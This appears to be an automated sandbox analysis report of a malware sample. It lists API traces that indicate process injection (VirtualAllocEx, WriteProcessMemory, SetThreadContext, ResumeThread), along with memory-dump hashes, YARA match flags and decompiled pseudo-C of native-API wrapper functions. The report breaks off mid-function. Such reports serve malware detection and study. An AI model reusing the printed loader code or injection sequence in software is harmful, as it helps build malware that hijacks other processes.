                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 325979ad521556e5207786835c31f4dca5fb4f8bf4c9e8b298e1cdd7a3c021e5
                                                • Instruction ID: 08a4103eb6ad422b3f582d765806d7fab613007c8cf7b3af3cd9c33d60fccee6
                                                • Opcode Fuzzy Hash: 325979ad521556e5207786835c31f4dca5fb4f8bf4c9e8b298e1cdd7a3c021e5
                                                • Instruction Fuzzy Hash: 66918971D042199FDF24CFA8C880BEEBBB2BF49314F158569E819A7240DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 008BBE0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2622ac2ca54029fbe56110ea325ffb02a923ff6c7c440a0ed2ef9b72ab4f38c4
                                                • Instruction ID: cf2e79e076c3c9477fc68bb14150a26aa7587e1d5f2085503c9738859ce0ba5d
                                                • Opcode Fuzzy Hash: 2622ac2ca54029fbe56110ea325ffb02a923ff6c7c440a0ed2ef9b72ab4f38c4
                                                • Instruction Fuzzy Hash: 58814470A00B058FD724DF2AC4507AABBF1FF88304F008929D58AD7B51DBB5E849CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 008BDD8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: ef885e7a4ea5bfa481b1cfc221f7a57a9aa78a8d42e8b7a35098d47f73c9492f
                                                • Instruction ID: c2f86e4f65a1ff74f7b2a97a4b736dc930371af30b2118da3dc73322fc0acfd0
                                                • Opcode Fuzzy Hash: ef885e7a4ea5bfa481b1cfc221f7a57a9aa78a8d42e8b7a35098d47f73c9492f
                                                • Instruction Fuzzy Hash: E451CDB1D00349AFDB14CFA9C880ADEBBB1FF48314F24852AE819AB310D7749985CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 008BDD8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 09897f1841fce663d2feda8e6bd9efa965a3621c002c0c3e12ec6f6f57d680e3
                                                • Instruction ID: d47e55c5e72d9819cc0eecbd7b9d80b075dc1cb273a8bb6aa31f4ed666a3f06c
                                                • Opcode Fuzzy Hash: 09897f1841fce663d2feda8e6bd9efa965a3621c002c0c3e12ec6f6f57d680e3
                                                • Instruction Fuzzy Hash: 7041ADB1D00309AFDB14CF99C884ADEBBB5FF48314F24852AE819AB350D775A945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B6E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 53017b554df271e9cecc109195681611fb78349b05c33d203dc82c725acbed40
                                                • Instruction ID: 51ffebf2f2675001abb62e3837b9a3232fdb9cd20c42190c84e79581ac882564
                                                • Opcode Fuzzy Hash: 53017b554df271e9cecc109195681611fb78349b05c33d203dc82c725acbed40
                                                • Instruction Fuzzy Hash: 6F416676900249AFCB01CFA9D884ADEBFF5FF49320F18806AEA44A7351C3359955CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 055E9380
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 3984e8320bd4e52205406acf5e7096e67620e39630179bae9a5dc4590f5d1356
                                                • Instruction ID: b89e7553bd7aa901a47d96e5cdf0fa47fdd6e6e96aa5bb997c774ce0c082d7e8
                                                • Opcode Fuzzy Hash: 3984e8320bd4e52205406acf5e7096e67620e39630179bae9a5dc4590f5d1356
                                                • Instruction Fuzzy Hash: B82119B19043499FCF10CFA9C884BDEBBF5FF48324F15842AE919A7240D7789954CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 055E8CDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 181b3a8982c1d14803af3ef77b39f7305d9d2f5f81aae3241bb93e8f629774ef
                                                • Instruction ID: 08dd979ee56dc211b0141241933022d5ec41ef2f00f31fecd05da651e40d5b75
                                                • Opcode Fuzzy Hash: 181b3a8982c1d14803af3ef77b39f7305d9d2f5f81aae3241bb93e8f629774ef
                                                • Instruction Fuzzy Hash: 97215971D042098FDB14DFAAC5847EEBBF4FF48264F148429D919A7240DB789945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B6E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: dc17321f3a9a51875aebef8e2c68c566adfb8f08061758128086582a196ff8ac
                                                • Instruction ID: 9a81e95d291f442c433588d1a8cb50510ebe5273e763b229c0c9b00e47e215a8
                                                • Opcode Fuzzy Hash: dc17321f3a9a51875aebef8e2c68c566adfb8f08061758128086582a196ff8ac
                                                • Instruction Fuzzy Hash: B32103B5900248AFDB10CFA9D484ADEBFF4FF48324F15841AE954A7311D378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetThreadContext.KERNELBASE(?,00000000), ref: 055E8CDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: ae419115210a60a7f821be18c1a66ed2bad7f3cbb70078d716f38e2d9b5666c4
                                                • Instruction ID: 8062460b76b7de49e485fd3e5f6c550cc2194916653c192d9fccf9c7db493407
                                                • Opcode Fuzzy Hash: ae419115210a60a7f821be18c1a66ed2bad7f3cbb70078d716f38e2d9b5666c4
                                                • Instruction Fuzzy Hash: 252137719043099FCB10CFAAC4847EEBBF4FF48224F158429D919A7240DB789945CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 055E9490
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: d73db0a882b67fa79a348935203d073dea7fb3fc37c570fa122a45cd5a38916b
                                                • Instruction ID: 49d669e06b84b9eb240dd7f592e483b00b9f89abb6f54e1bb5ed4f137f25cde2
                                                • Opcode Fuzzy Hash: d73db0a882b67fa79a348935203d073dea7fb3fc37c570fa122a45cd5a38916b
                                                • Instruction Fuzzy Hash: 1C2116B1C003499FCB10CFAAC880BDEBBF5FF48324F158429E919A7240D7749944CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008B6E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: b0c7da707c99615ad26f13bf68d226370f9c543a2ac996b450950b3d801e1716
                                                • Instruction ID: 7cf17a9937bc509b26f43ff21e79c25623211fe590ac3526280bde02b7dd2c96
                                                • Opcode Fuzzy Hash: b0c7da707c99615ad26f13bf68d226370f9c543a2ac996b450950b3d801e1716
                                                • Instruction Fuzzy Hash: A921C6B5900249AFDB10CFA9D484ADEFBF4FB48324F14841AE915A7310D374A954CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BBE89,00000800,00000000,00000000), ref: 008BC09A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BBE89,00000800,00000000,00000000), ref: 008BC09A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 055E926E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 008BBE0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 055EB9DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 055ED108
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowLongW.USER32(?,?,?), ref: 008BDF1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LongWindow
                                                • String ID:
                                                • API String ID: 1378638983-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowLongW.USER32(?,?,?), ref: 008BDF1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID: LongWindow
                                                • String ID:
                                                • API String ID: 1378638983-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232100693.000000000057D000.00000040.00000001.sdmp, Offset: 0057D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232100693.000000000057D000.00000040.00000001.sdmp, Offset: 0057D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: TOW$TOW$TOW
                                                • API String ID: 0-3270659114
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: W
                                                • API String ID: 0-655174618
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E00419E1F(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				signed int _v117;
                                                				void* _t20;
                                                				void* _t29;
                                                				void* _t30;
                                                				intOrPtr* _t31;
                                                				void* _t33;
                                                
                                                				_v117 =  !_v117;
                                                				_t15 = _a4;
                                                				_t31 = _a4 + 0xc48;
                                                				E0041A970(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                                				_t8 =  &_a32; // 0x414d42
                                                				_t14 =  &_a8; // 0x414d42
                                                				_t20 =  *((intOrPtr*)( *_t31))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t30, _t33); // executed
                                                				return _t20;
                                                			}










                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E00419E20(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4;
                                                				_t28 = _a4 + 0xc48;
                                                				E0041A970(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t6 =  &_a32; // 0x414d42
                                                				_t12 =  &_a8; // 0x414d42
                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                				return _t18;
                                                			}







                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				char* _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                
                                                				_v8 =  &_v536;
                                                				_t15 = E0041C660( &_v12, 0x104, _a8);
                                                				_t31 = _t30 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041CA80(__eflags, _v8);
                                                					_t32 = _t31 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041CD00( &_v12, 0);
                                                						_t32 = _t32 + 8;
                                                					}
                                                					_t18 = E0041AEB0(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}














                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419D70(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E0041A970(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}






                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DBD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E00419F4C(void* __ecx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				char _v1;
                                                				long _t14;
                                                				void* _t23;
                                                
                                                				asm("adc ah, 0x55");
                                                				_push( &_v1);
                                                				_t10 = _a4;
                                                				_t3 = _t10 + 0xc60; // 0xca0
                                                				E0041A970(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}







                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB44,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F89
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419F50(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E0041A970(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}






                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB44,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F89
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419EA0(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a923
                                                				E0041A970(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}






                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EC5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DBD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A06D
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0E8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateExitHeapProcess
                                                • String ID:
                                                • API String ID: 1054155344-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				long _t21;
                                                				intOrPtr* _t25;
                                                				void* _t26;
                                                				void* _t30;
                                                
                                                				_t30 = __eflags;
                                                				_v68 = 0;
                                                				E0041B870( &_v67, 0, 0x3f);
                                                				E0041C410( &_v68, 3);
                                                				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
